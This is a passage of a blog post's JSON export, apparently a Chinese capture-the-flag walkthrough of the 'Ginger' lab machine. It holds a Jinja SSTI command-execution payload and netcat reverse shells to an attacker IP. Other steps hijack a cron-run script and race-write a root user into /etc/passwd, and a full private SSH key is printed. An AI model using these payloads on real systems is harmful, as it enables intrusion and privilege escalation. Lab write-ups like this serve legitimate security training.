src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250619105627654\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u5c1d\u8bd5\u53e6\u542f\u7ec8\u7aef\u5728\u672c\u5730\u6d4b\u8bd5\uff0c\u4f46\u662f\uff1a<\/p>\n<pre><code class=\"language-bash\">sabrina@ginger:~$ cd \/tmp\nsabrina@ginger:\/tmp$ curl http:\/\/127.0.0.1:5000\/\n-bash: curl: command not found<\/code><\/pre>\n<p>\u4f7f\u7528<code>ssh<\/code>\u8f6c\u63a5\u76f8\u5173\u7aef\u53e3\uff1a<\/p>\n<pre><code class=\"language-bash\">ssh -L 5000:127.0.0.1:5000 sabrina@$IP<\/code><\/pre>\n<p>\u770b\u4e00\u4e0b\u662f\u5426\u5f00\u653e\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Ginger]\n\u2514\u2500$ curl -s http:\/\/127.0.0.1:5000\n&lt;h2&gt;Hello world!&lt;\/h2&gt; <\/code><\/pre>\n<p>\u7ee7\u7eed\u8fdb\u884c\u6d4b\u8bd5\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Ginger]\n\u2514\u2500$ curl -s &quot;http:\/\/127.0.0.1:5000\/?name=aaaa&quot;\n&lt;h2&gt;Hello aaaa!&lt;\/h2&gt;                                                                                                                                                                                             \n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Ginger]\n\u2514\u2500$ curl -s &quot;http:\/\/127.0.0.1:5000\/?name=\\{\\{7*7\\}\\}&quot;\n&lt;h2&gt;Hello 49!&lt;\/h2&gt;<\/code><\/pre>\n<p>\u679c\u7136\u5b58\u5728<code>SSTI<\/code>\u6f0f\u6d1e\uff0c\u5c1d\u8bd5\u6267\u884c\u547d\u4ee4\uff1a<\/p>\n<pre><code>http:\/\/127.0.0.1:5000\/?name={{ self.__init__.__globals__.__builtins__.__import__(&quot;os&quot;).popen(&quot;whoami&quot;).read() }}<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300888.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300888.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250619111434501\" \/><\/div><\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Ginger]\n\u2514\u2500$ curl -s -G &#039;http:\/\/127.0.0.1:5000\/&#039; --data-urlencode &#039;name={{ self.__init__.__globals__.__builtins__.__import__(&quot;os&quot;).popen(&quot;whoami&quot;).read() }}&#039; | html2text\n***** Hello webmaster ! *****<\/code><\/pre>\n<p>\u5c1d\u8bd5\u53cd\u5f39shell\uff01\uff01\uff01<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Ginger]\n\u2514\u2500$ curl -s -G &#039;http:\/\/127.0.0.1:5000\/&#039; --data-urlencode &#039;name={{ self.__init__.__globals__.__builtins__.__import__(&quot;os&quot;).popen(&quot;nc -e \/bin\/bash 192.168.10.107 2345&quot;).read() }}&#039; | html2text<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300889.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300889.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250619112014443\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>\u63d0\u6743caroline<\/h3>\n<pre><code class=\"language-bash\">(remote) webmaster@ginger:\/home\/caroline$ ls -la\ntotal 40\ndrwxr-xr-- 5 caroline webmaster 4096 May 25  2021 .\ndrwxr-xr-x 5 root     root      4096 May 21  2021 ..\ndrwxrwx--- 2 caroline webmaster 4096 May 22  2021 backup\nlrwxrwxrwx 1 root     root         9 May 25  2021 .bash_history -&gt; \/dev\/null\n-rw-r--r-- 1 caroline caroline   220 May 21  2021 .bash_logout\n-rw-r--r-- 1 caroline caroline  3526 May 21  2021 .bashrc\ndrwx------ 3 caroline caroline  4096 May 22  2021 .gnupg\ndrwxr-xr-x 3 caroline caroline  4096 May 21  2021 .local\n-rw-r--r-- 1 caroline caroline   807 May 21  2021 .profile\n-rw-r--r-- 1 caroline caroline    66 May 21  2021 .selected_editor\n-rwx------ 1 caroline caroline    33 May 22  2021 user.txt\n(remote) webmaster@ginger:\/home\/caroline$ cd backup\/\n(remote) webmaster@ginger:\/home\/caroline\/backup$ ls -la\ntotal 12\ndrwxrwx--- 2 caroline webmaster 4096 May 22  2021 .\ndrwxr-xr-- 5 caroline webmaster 4096 May 25  2021 ..\n-rwxr-xr-x 1 caroline caroline    44 May 21  2021 backup.sh\n(remote) webmaster@ginger:\/home\/caroline\/backup$ cat backup.sh \n#!\/bin\/bash\n\/usr\/bin\/cp -r \/home\/caroline\/*<\/code><\/pre>\n<p>\u8fd9\u79cd\u811a\u672c\u76f2\u83dc\u662f\u5b9a\u65f6\u811a\u672c\uff0c\u5c1d\u8bd5\u8fdb\u884c\u5229\u7528\uff0c\u5c1d\u8bd5\u52a0\u4e00\u4e2a<code>.ssh<\/code>\u8fdb\u884c\u767b\u5f55\uff0c\u4ee5\u514d\u5360\u7528\u8fc7\u591a\u7ec8\u7aef\u3002<\/p>\n<pre><code class=\"language-bash\">(remote) webmaster@ginger:\/home\/webmaster$ mkdir .ssh\n(remote) webmaster@ginger:\/home\/webmaster$ chmod 700 .ssh\n(remote) webmaster@ginger:\/home\/webmaster$ cd .ssh\n(remote) webmaster@ginger:\/home\/webmaster\/.ssh$ ssh-keygen -t rsa -o\nGenerating public\/private rsa key pair.\nEnter file in which to save the key (\/home\/webmaster\/.ssh\/id_rsa): \nEnter passphrase (empty for no passphrase): \nEnter same passphrase again: \nYour identification has been saved in \/home\/webmaster\/.ssh\/id_rsa.\nYour public key has been saved in \/home\/webmaster\/.ssh\/id_rsa.pub.\nThe key fingerprint is:\nSHA256:pVeSHFJOvE1MgHi4koodE\/FcAEooDYECi69sebF8BaU webmaster@ginger\nThe key&#039;s randomart image is:\n+---[RSA 2048]----+\n|B=oo...+.+=+.    |\n|Booo .= o=.oo    |\n|*  .oE o  *+.    |\n| .o o o  o.o.    |\n| o.= . .S .      |\n|o.= o .  .       |\n|.+ + .           |\n|. . .            |\n|                 |\n+----[SHA256]-----+\n(remote) webmaster@ginger:\/home\/webmaster\/.ssh$ cat id_rsa\n-----BEGIN OPENSSH PRIVATE KEY-----\nb3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn\nNhAAAAAwEAAQAAAQEA3VIGvpOCZ7rc9hIrtFwrX8GDD4JlCZMAOKpGW5mL8rAXuDV23Pfi\nb9566akoUs14EnzTxgRwqCILck3PzmEcioihK4YYNW3GmhzjTbwqE9Ydplu47\/MsGvLS8n\ncAHuIH\/S0Vh\/tR8JR5TiIwpL3vCZKRKSw2HASWC9Xlj\/Ir5f20+xtTU26mBOCjJR1vJXWN\nLi0p7oLZN7o6cUTmkGpXsvX0VWOfwA42Hl0N\/odV81Z6z3eCjZKVKsek6nCB1aJCfloQAk\n+V7v\/xWTuUsRc\/6cCK0cGHghAEI71xU0IGT486uhSTx4EyXduriTj\/YO2cT\/OkkeRG6aLM\nCbV3L7hYPwAAA8iKss6birLOmwAAAAdzc2gtcnNhAAABAQDdUga+k4Jnutz2Eiu0XCtfwY\nMPgmUJkwA4qkZbmYvysBe4NXbc9+Jv3nrpqShSzXgSfNPGBHCoIgtyTc\/OYRyKiKErhhg1\nbcaaHONNvCoT1h2mW7jv8ywa8tLydwAe4gf9LRWH+1HwlHlOIjCkve8JkpEpLDYcBJYL1e\nWP8ivl\/bT7G1NTbqYE4KMlHW8ldY0uLSnugtk3ujpxROaQaley9fRVY5\/ADjYeXQ3+h1Xz\nVnrPd4KNkpUqx6TqcIHVokJ+WhACT5Xu\/\/FZO5SxFz\/pwIrRwYeCEAQjvXFTQgZPjzq6FJ\nPHgTJd26uJOP9g7ZxP86SR5EbposwJtXcvuFg\/AAAAAwEAAQAAAQEAxFqh4TK934nJwAce\n\/0VGtg3ZWUk2mufwqlVnVp1DrGzOnn\/QlPrXyqh4JBYP0Ga6wKw+ts\/5ozGRNjgSxecii0\nXst9CgacabDN\/USoNGUZMFezKlQT1dRAtrW\/J4CO5AaD43fA1dBTS06r0qqv5XtQZ0AzNW\nTkVDWfzLTopsp\/5oeDZEfEJxMcqH8D+plcH7GwJ5+IsC2UeNo\/DFkgeDWA8V0oOZcjWtwC\nMxUt0NXEbpZ2fpw0IHUzozwnIniDEuuQMF1Cnb+\/4JHtvo2WvhgQ5zYl7c5vF2bgQypcCr\njrDT\/5T4IopF+JlmW\/gEhnuYtGeOVm7P\/AJDaCtA4gMJAQAAAIBx5BNaWJB3xWmdJRUEgw\nvP0bJ3XDSsDcShCd8tJkCho1ROWbR0kOwpaDIKR0+NDMipDxr6K4GuVcANzQsTPJ0RMIZ4\nORwGPh4tfT6iTdaqL93cW5Q+6\/IcTMW1gskgweiQIpNStdBWrMGoaaZxuWzWW\/X4Jn8PQs\ngf86tfPQZHUwAAAIEA+CbZwq58xDTgJSHspKXjGCoC29fS3hUT3QjbllZhH+ZvXB5b7Oek\nLixIH7u2H1Tqp7mpWPhN99Y6Gy7TCJyC2sj0AgdGhxUfzia4ZikImHkAfFrFQc5tlk4lrA\nhFXTQaDzJYJGkltOnQkNtsAUuViPxi6nBFcFzOy6HiPwNd5KUAAACBAORR79zI+4tbXM3H\ns2y2C9TV9qV2nNcMV9uYmnFS6ozmOk+mFOPHlNy8m\/gGu\/APv+lshK6tKuz7OIy004guup\nEV+N5l5yxFiwQ2\/7Ir0qgWgmWaRNWq1gHF1i7G4vEtFcZMPYc3dfCwoSiIeLy3XmtQLsuc\nWX29ox1iH\/cp8OATAAAAEHdlYm1hc3RlckBnaW5nZXIBAg==\n-----END OPENSSH PRIVATE KEY-----\n(remote) webmaster@ginger:\/home\/webmaster\/.ssh$ cp id_rsa.pub authorized_keys\n(remote) webmaster@ginger:\/home\/webmaster\/.ssh$ ls -la\ntotal 20\ndrwx------ 2 webmaster webmaster 4096 Jun 19 06:25 .\ndrwx------ 5 webmaster webmaster 4096 Jun 19 06:25 ..\n-rw-r--r-- 1 webmaster webmaster  398 Jun 19 06:25 authorized_keys\n-rw------- 1 webmaster webmaster 1823 Jun 19 06:25 id_rsa\n-rw-r--r-- 1 webmaster webmaster  398 Jun 19 06:25 id_rsa.pub<\/code><\/pre>\n<p>\u5c1d\u8bd5ssh\u8fde\u63a5\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300890.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300890.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250619122739403\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u53ef\u4ee5\u65ad\u5f00\u5176\u4ed6\u7ec8\u7aef\u8fdb\u884c\u64cd\u4f5c\u4e86\uff01<\/p>\n<pre><code class=\"language-bash\">webmaster@ginger:\/home\/caroline\/backup$ echo &#039;nc -e \/bin\/bash 192.168.10.107 3456&#039; &gt; \/tmp\/backup.sh\nwebmaster@ginger:\/home\/caroline\/backup$ rm backup.sh \nrm: remove write-protected regular file &#039;backup.sh&#039;? y\nwebmaster@ginger:\/home\/caroline\/backup$ cp \/tmp\/backup.sh .\/backup.sh\nwebmaster@ginger:\/home\/caroline\/backup$ ls -la\ntotal 12\ndrwxrwx--- 2 caroline  webmaster 4096 Jun 19 06:32 .\ndrwxr-xr-- 5 caroline  webmaster 4096 May 25  2021 ..\n-rw-r--r-- 1 webmaster webmaster   36 Jun 19 06:32 backup.sh\nwebmaster@ginger:\/home\/caroline\/backup$ chmod +x backup.sh<\/code><\/pre>\n<p>\u53e6\u4e00\u8fb9\u679c\u7136\u5f39\u8fc7\u6765\u4e86\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300891.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300891.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250619123317796\" style=\"zoom: 50%;\" \/><\/div><\/p>\n<pre><code class=\"language-bash\">(remote) caroline@ginger:\/home\/caroline$ file \/srv\/code\n\/srv\/code: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter \/lib64\/ld-linux-x86-64.so.2, BuildID[sha1]=06cba5f9173dbfdccbdca31eb0477b26ed1e27ff, for GNU\/Linux 3.2.0, not stripped\n(remote) caroline@ginger:\/home\/caroline$ crontab -l\n# Edit this file to introduce tasks to be run by cron.\n# \n# Each task to run has to be defined through a single line\n# indicating with different fields when the task will be run\n# and what command to run for the task\n# \n# To define the time you can provide concrete values for\n# minute (m), hour (h), day of month (dom), month (mon),\n# and day of week (dow) or use &#039;*&#039; in these fields (for &#039;any&#039;).\n# \n# Notice that tasks will be started based on the cron&#039;s system\n# daemon&#039;s notion of time and timezones.\n# \n# Output of the crontab jobs (including errors) is sent through\n# email to the user the crontab file belongs to (unless redirected).\n# \n# For example, you can run a backup of all your user accounts\n# at 5 a.m every week with:\n# 0 5 * * 1 tar -zcf \/var\/backups\/home.tgz \/home\/\n# \n# For more information see the manual pages of crontab(5) and cron(8)\n# \n# m h  dom mon dow   command\n\n* * * * * bash ~\/backup\/backup.sh<\/code><\/pre>\n<p>\u679c\u7136\u662f\u5b9a\u65f6\u4efb\u52a1\u3002<\/p>\n<h3>\u7ade\u4e89\u63d0\u6743root<\/h3>\n<pre><code class=\"language-bash\">(remote) caroline@ginger:\/home\/caroline$ ls -la\ntotal 40\ndrwxr-xr-- 5 caroline webmaster 4096 May 25  2021 .\ndrwxr-xr-x 5 root     root      4096 May 21  2021 ..\ndrwxrwx--- 2 caroline webmaster 4096 Jun 19 06:32 backup\nlrwxrwxrwx 1 root     root         9 May 25  2021 .bash_history -&gt; \/dev\/null\n-rw-r--r-- 1 caroline caroline   220 May 21  2021 .bash_logout\n-rw-r--r-- 1 caroline caroline  3526 May 21  2021 .bashrc\ndrwx------ 3 caroline caroline  4096 May 22  2021 .gnupg\ndrwxr-xr-x 3 caroline caroline  4096 May 21  2021 .local\n-rw-r--r-- 1 caroline caroline   807 May 21  2021 .profile\n-rw-r--r-- 1 caroline caroline    66 May 21  2021 .selected_editor\n-rwx------ 1 caroline caroline    33 May 22  2021 user.txt\n(remote) caroline@ginger:\/home\/caroline$ cat user.txt \nf65aaadaeeb04adaccba45d7babf5f8c\n(remote) caroline@ginger:\/home\/caroline$ sudo -l\nMatching Defaults entries for caroline on ginger:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser caroline may run the following commands on ginger:\n    (ALL : ALL) NOPASSWD: \/srv\/code<\/code><\/pre>\n<p>\u4e0b\u8f7d\u5230\u672c\u5730\u8fdb\u884c\u5206\u6790\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300892.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300892.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250619123827148\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300893.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300893.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250619123850391\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u8fd9\u5c31\u662f\u5728\u5371\u9669\u8fb9\u7f18\u75af\u72c2\u8e66\u8fea\uff0c\u5c1d\u8bd5\u7ade\u4e89\u5199\u5165\u5373\u53ef\uff1a<\/p>\n<pre><code class=\"language-bash\">(remote) caroline@ginger:\/home\/caroline$ cat \/etc\/passwd | grep root\nroot:x:0:0:root:\/root:\/bin\/bash\n(remote) caroline@ginger:\/home\/caroline$ printf &quot;kali:$(openssl passwd -1):0:0:root:\/root:\/bin\/bash&quot;\nPassword: \nVerifying - Password: \nkali:$1$8sVzWutt$M10cgy87.pU\/kWXId8Iiy\/:0:0:root:\/root:\/bin\/bash<\/code><\/pre>\n<p>\u5c1d\u8bd5\u5199\u5165\uff1a<\/p>\n<pre><code class=\"language-bash\">while true; do echo &#039;kali:$1$8sVzWutt$M10cgy87.pU\/kWXId8Iiy\/:0:0:root:\/root:\/bin\/bash&#039; &gt;&gt; \/etc\/passwd 2&gt;\/dev\/null; sleep 3; tail -n 1 \/etc\/passwd; done<\/code><\/pre>\n<p>\u53e6\u4e00\u8fb9\u542f\u52a8\u7a0b\u5e8f\u5373\u53ef\uff1a<\/p>\n<pre><code class=\"language-bash\">(remote) caroline@ginger:\/home\/caroline$ sudo \/srv\/code<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300894.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300894.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250619125731850\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300895.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300895.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250619125741352\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u5c1d\u8bd5\u5207\u6362\u7528\u6237\uff0c\u6210\u529f\uff01<strong>PS:\u672a\u8bbe\u7f6e\u5bc6\u7801\u9ed8\u8ba4\u5c31\u662f\u7a7a\u5bc6\u7801\uff0c\u76f4\u63a5\u56de\u8f66\u5373\u53ef<\/strong><\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300896.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300896.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250619125942818\" style=\"zoom:50%;\" \/><\/div><\/p>\n<pre><code class=\"language-bash\">root@ginger:\/home\/caroline# whoami;id\nroot\nuid=0(root) gid=0(root) groups=0(root)\nroot@ginger:\/home\/caroline# cd \/root\nroot@ginger:~# ls -la\ntotal 40\ndrwx------  5 root root 4096 Jun  2  2021 .\ndrwxr-xr-x 18 root root 4096 May 19  2021 ..\nlrwxrwxrwx  1 root root    9 May 25  2021 .bash_history -&gt; \/dev\/null\n-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc\ndrwx------  3 root root 4096 May 21  2021 .cache\ndrwx------  3 root root 4096 May 21  2021 .gnupg\ndrwxr-xr-x  3 root root 4096 May 22  2021 .local\n-rw-------  1 root root 1563 Jun  2  2021 .mysql_history\n-rw-r--r--  1 root root  149 May 21  2021 .profile\n-rwx------  1 root root   33 May 22  2021 root.txt\n-rw-r--r--  1 root root   66 May 21  2021 .selected_editor\nroot@ginger:~# cat root.txt \nae426c9d237d676044e5cd8e8af9ef7f<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>Ginger \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf \u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Ginger] \u2514\u2500$ rus [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,18],"tags":[],"class_list":["post-893","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/893","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=893"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/893\/revisions"}],"predecessor-version":[{"id":894,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/893\/revisions\/894"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=893"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=893"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=893"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}